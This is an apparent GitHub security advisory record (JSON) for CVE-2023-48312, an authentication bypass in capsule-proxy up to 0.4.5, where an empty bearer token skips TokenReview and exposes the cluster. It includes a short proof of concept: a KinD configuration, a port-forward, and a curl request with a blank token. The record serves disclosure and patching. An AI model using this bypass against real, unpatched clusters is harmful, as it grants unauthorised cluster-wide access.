{"id":"GHSA-fpvw-6m5v-hqfp","summary":"Capsule Proxy Authentication bypass using an empty token","details":"The privilege escalation is based on a missing check if the user is authenticated based on the `TokenReview` result.\n\nAll the clusters running with the `anonymous-auth` Kubernetes API Server setting disable (set to `false`) are affected since it would be possible to bypass the token review mechanism, interacting with the upper Kubernetes API Server.\n\n# PoC\n\nStart a KinD cluster with the `anonymous-auth` value to `false`. \nIf it is true, it uses anonymous permissions which are very limited by default\n\n```yaml\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nnodes:\n- role: control-plane\n  kubeadmConfigPatches:\n  - |\n    kind: ClusterConfiguration\n    apiServer:\n        extraArgs:\n          anonymous-auth: \"false\"\n```\n\nInstall `capsule` and `capsule-proxy`\n\n```\nk port-forward svc/capsule-proxy 9001    \nForwarding from 127.0.0.1:9001 -\u003e 9001\nForwarding from [::1]:9001 -\u003e 9001\nHandling connection for 9001\n```\n\nThen query the proxy\n```\ncurl -g -k -H 'Authorization: Bearer   f' -X 'GET' 'https://localhost:9001/api/v1/namespaces'\n```\n\n# Impact\n\nThe whole cluster is exposed to unauthorised users.\n\nThis privilege escalation cannot be exploited if you're relying only on client certificates (SSL/TLS).","aliases":["CVE-2023-48312","GO-2023-2351"],"modified":"2024-08-21T14:56:40.597662Z","published":"2023-11-24T16:53:25Z","database_specific":{"github_reviewed_at":"2023-11-24T16:53:25Z","github_reviewed":true,"severity":"CRITICAL","cwe_ids":["CWE-287"],"nvd_published_at":"2023-11-24T18:15:07Z"},"references":[{"type":"WEB","url":"https://github.com/projectcapsule/capsule-proxy/security/advisories/GHSA-fpvw-6m5v-hqfp"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-48312"},{"type":"WEB","url":"https://github.com/projectcapsule/capsule-proxy/commit/472404f7006a4152e4eec76dee07324dd1e6e823"},{"type":"PACKAGE","url":"https://github.com/projectcapsule/capsule-proxy"}],"affected":[{"package":{"name":"github.com/projectcapsule/capsule-proxy","ecosystem":"Go","purl":"pkg:golang/github.com/projectcapsule/capsule-proxy"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"0.4.6"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 0.4.5","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fpvw-6m5v-hqfp/GHSA-fpvw-6m5v-hqfp.json"}},{"package":{"name":"github.com/clastix/capsule-proxy","ecosystem":"Go","purl":"pkg:golang/github.com/clastix/capsule-proxy"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"0.4.6"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 0.4.5","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fpvw-6m5v-hqfp/GHSA-fpvw-6m5v-hqfp.json"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}]}